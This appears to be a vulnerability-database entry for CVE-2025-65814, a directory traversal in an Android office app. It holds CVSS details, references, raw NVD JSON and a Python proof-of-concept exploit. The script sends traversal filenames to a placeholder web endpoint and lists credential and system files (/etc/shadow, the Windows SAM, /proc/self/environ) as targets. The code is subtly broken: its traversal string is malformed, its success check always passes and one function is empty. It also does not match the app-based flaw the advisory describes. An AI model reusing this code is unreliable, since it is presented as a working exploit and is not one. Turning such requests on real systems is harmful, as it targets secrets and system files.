CVE-2025-65814

Description

A lack of security checks in the file import process of RHOPHI Analytics LLP Office App-Edit Word v6.4.1 allows attackers to execute a directory traversal.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:a1apps:office_app-edit_word\,_pdf_file:6.4.1:*:*:*:*:android:*:* - VULNERABLE

RHOPHI Office App-Edit Word v6.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65814 PoC - RHOPHI Office App-Edit Word Directory Traversal
This PoC demonstrates the directory traversal vulnerability in the file import function.
"""

import requests
import urllib.parse

# Target configuration
TARGET_URL = "http://target-server.com/api/import"
TARGET_FILE = "../../../../etc/passwd"

def exploit_directory_traversal():
    """
    Exploit the directory traversal vulnerability in file import function.
    The application does not validate file paths properly, allowing path traversal.
    """
    # Construct the malicious filename with path traversal sequence
    malicious_filename = ".." * 4 + "/etc/passwd"
    
    # Prepare the file import request
    files = {
        'file': (malicious_filename, 'test content', 'text/plain')
    }
    
    # Alternative method: using filename parameter
    data = {
        'filename': malicious_filename,
        'action': 'import'
    }
    
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Malicious filename: {malicious_filename}")
    print(f"[*] Attempting to read: /etc/passwd")
    
    try:
        # Send the malicious request
        response = requests.post(TARGET_URL, files=files, data=data, timeout=10)
        
        print(f"[*] Response Status: {response.status_code}")
        
        if response.status_code == 200:
            # Check if we successfully read the file
            if 'root:' in response.text or response.text:
                print("[+] SUCCESS! File content retrieved:")
                print("-" * 50)
                print(response.text[:500])  # Print first 500 chars
                print("-" * 50)
                return True
        
        print("[-] Exploitation may have failed or file not accessible")
        print(f"[-] Response: {response.text[:200]}")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def test_common_paths():
    """
    Test common sensitive file paths that might be accessible via traversal.
    """
    common_paths = [
        "../../../../etc/passwd",
        "../../../../etc/shadow",
        "..\\..\\..\\windows\\system32\\config\\sam",
        "../../../../var/log/messages",
        "../../../../proc/self/environ"
    ]
    
    print("\n[*] Testing common sensitive file paths...")
    
    for path in common_paths:
        print(f"[*] Testing: {path}")
        # Simplified test - in real scenario, adapt to actual API endpoint
        encoded_path = urllib.parse.quote(path)
        # Add your actual exploitation logic here

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-65814 Directory Traversal PoC")
    print("Target: RHOPHI Office App-Edit Word v6.4.1")
    print("=" * 60)
    
    # Run the exploit
    success = exploit_directory_traversal()
    
    if success:
        print("\n[!] Vulnerability confirmed!")
        print("[!] Immediate patching recommended.")
    else:
        print("\n[-] Exploitation did not yield expected results")
        print("[-] Target may be patched or not vulnerable")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65814
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65814
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65814/
[4] VulDB https://vuldb.com/cve/CVE-2025-65814
[5] https://developer.android.com/privacy-and-security/risks/untrustworthy-contentprovider-provided-filename
[6] https://github.com/Secsys-FDU/AF_CVEs/issues/6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65814", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:55.090", "lastModified": "2025-12-17T17:51:48.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A lack of security checks in the file import process of RHOPHI Analytics LLP Office App-Edit Word v6.4.1 allows attackers to execute a directory traversal."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:a1apps:office_app-edit_word\\,_pdf_file:6.4.1:*:*:*:*:android:*:*", "matchCriteriaId": "6D8AF847-A594-4902-AC36-CFCDB6DFD673"}]}]}], "references": [{"url": "https://developer.android.com/privacy-and-security/risks/untrustworthy-contentprovider-provided-filename", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}